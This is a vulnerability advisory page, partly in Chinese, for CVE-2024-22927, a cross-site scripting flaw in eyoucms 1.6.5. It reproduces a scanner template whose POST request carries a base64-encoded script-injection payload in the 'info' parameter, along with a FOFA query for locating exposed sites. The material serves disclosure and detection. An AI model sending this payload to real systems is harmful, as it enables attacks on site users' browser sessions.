CVE-2024-22927: eyoucms v.1.6.5 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: eyoucms | POC: 已公开

漏洞描述

Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.

PoC代码[已公开]

id: CVE-2024-22927

info:
  name: eyoucms v.1.6.5 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.
  impact: |
    Allows attackers to execute malicious scripts on the victim's browser.
  remediation: |
    Upgrade eyoucms to version 1.6.6 or later to fix the XSS vulnerability.
  reference:
    - https://github.com/weng-xianhu/eyoucms/issues/57
    - https://nvd.nist.gov/vuln/detail/CVE-2024-22927
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-22927
    cwe-id: CWE-79
    epss-score: 0.02554
    epss-percentile: 0.84976
    cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: eyoucms
    product: eyoucms
    fofa-query: "title=\"eyoucms\""
  tags: cve2024,cve,eyoucms,cms,xss

http:
  - method: POST
    path:
      - "{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'name="num" value="1"><ScRiPt >alert(document.domain)</ScRiPt>'
          - 'id="eytime"'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a004630440220632468e7f87fe20c94fc9ad8f5e40d0fc7b1620133ac983b4044e45122d5e4a402207bf6f5ae2eeb0f4bb94d1d9c7427883448c6083f7272cc63cb909c89cd00f357:922c64590222798bb761d5b6d8e72950

相关漏洞推荐